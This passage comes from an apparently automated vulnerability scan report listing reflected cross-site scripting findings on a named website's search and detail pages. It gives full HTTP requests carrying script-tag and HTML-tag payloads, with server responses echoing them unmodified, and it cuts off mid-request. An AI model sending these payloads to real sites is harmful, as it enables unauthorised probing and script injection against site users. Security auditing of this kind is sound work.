HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos4fdfe<script>alert(1)</script>289d8c6c7c3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1636. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7cadb<script>alert(1)</script>f88c04ec8be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/search.php7cadb<script>alert(1)</script>f88c04ec8be?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php7cadb<script>alert(1)</script>f88c04ec8be?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1637. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 538c6<a>8d5807a7317 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search538c6<a>8d5807a7317&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search538c6<a>8d5807a7317&opt=2 was not found on this server.</p>
...[SNIP]...

2.1638. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 710fc<a>8f168b8c7b0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...710fc<a>8f168b8c7b0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...710fc<a>8f168b8c7b0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1639. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6e166<script>alert(1)</script>b40eff45d96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&6e166<script>alert(1)</script>b40eff45d96=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&6e166<script>alert(1)</script>b40eff45d96=1 was not found on this server.</p>
...[SNIP]...

2.1640. http://www.resellerbase.com/detail/19/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 6a6ff<a>0e9f9010ac0 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26a6ff<a>0e9f9010ac0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=26a6ff<a>0e9f9010ac0 was not found on this server.</p>
...[SNIP]...

2.1641. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2bce<script>alert(1)</script>0ae02274197 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila2bce<script>alert(1)</script>0ae02274197/19/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila2bce<script>alert(1)</script>0ae02274197/19/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1642. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f8c37<script>alert(1)</script>d6fe047e7af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19f8c37<script>alert(1)</script>d6fe047e7af/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19f8c37<script>alert(1)</script>d6fe047e7af/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1643. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 511f2<script>alert(1)</script>30938866de4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes511f2<script>alert(1)</script>30938866de4/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes511f2<script>alert(1)</script>30938866de4/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1644. http://www.resellerbase.com/detail/19/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 404d9<script>alert(1)</script>7bac3e1b76a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/search.php404d9<script>alert(1)</script>7bac3e1b76a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php404d9<script>alert(1)</script>7bac3e1b76a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1645. http://www.resellerbase.com/detail/19/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 541e7<a>ad12edb281 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search541e7<a>ad12edb281&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...&Submit3=Search541e7<a>ad12edb281&opt=2 was not found on this server.</p>
...[SNIP]...

2.1646. http://www.resellerbase.com/detail/19/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 749f1<a>cbe8871a4fa was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/search.php?keyword=search...749f1<a>cbe8871a4fa&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...749f1<a>cbe8871a4fa&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1647. http://www.resellerbase.com/detail/19/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload dfb70<script>alert(1)</script>026ddcd99d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2&dfb70<script>alert(1)</script>026ddcd99d1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2&dfb70<script>alert(1)</script>026ddcd99d1=1 was not found on this server.</p>
...[SNIP]...

2.1648. http://www.resellerbase.com/detail/19/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload f0cdf<a>596b3ad7d52 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2f0cdf<a>596b3ad7d52 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/search.php?keyword=search...&Submit3=Search&opt=2f0cdf<a>596b3ad7d52 was not found on this server.</p>
...[SNIP]...

2.1649. http://www.resellerbase.com/detail/20/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80a03<script>alert(1)</script>ffd9514a7e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail80a03<script>alert(1)</script>ffd9514a7e1/20/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail80a03<script>alert(1)</script>ffd9514a7e1/20/ was not found on this server.</p>
...[SNIP]...

2.1650. http://www.resellerbase.com/detail/20/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11eb5<script>alert(1)</script>a0e53ff4be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/2011eb5<script>alert(1)</script>a0e53ff4be7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2011eb5<script>alert(1)</script>a0e53ff4be7/ was not found on this server.</p>
...[SNIP]...

2.1651. http://www.resellerbase.com/detail/20/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bdd24<script>alert(1)</script>d0b9e155429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/?bdd24<script>alert(1)</script>d0b9e155429=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/20/?bdd24<script>alert(1)</script>d0b9e155429=1 was not found on this server.</p>
...[SNIP]...

2.1652. http://www.resellerbase.com/detail/20/ian-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/ian-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a2b5c<script>alert(1)</script>4491a80e448 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila2b5c<script>alert(1)</script>4491a80e448/20/ian-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila2b5c<script>alert(1)</script>4491a80e448/20/ian-com.html was not found on this server.</p>
...[SNIP]...

2.1653. http://www.resellerbase.com/detail/20/ian-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/20/ian-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25889<a>e471b2e7457 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/2025889<a>e471b2e7457/ian-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/2025889<a>e471b2e7457/ian-com.html was not found on this server.</p>
...[SNIP]...

2.1654. http://www.resellerbase.com/detail/20/ian-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/20/ian-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3f9d9<script>alert(1)</script>92818c4536 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/20/3f9d9<script>alert(1)</script>92818c4536 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
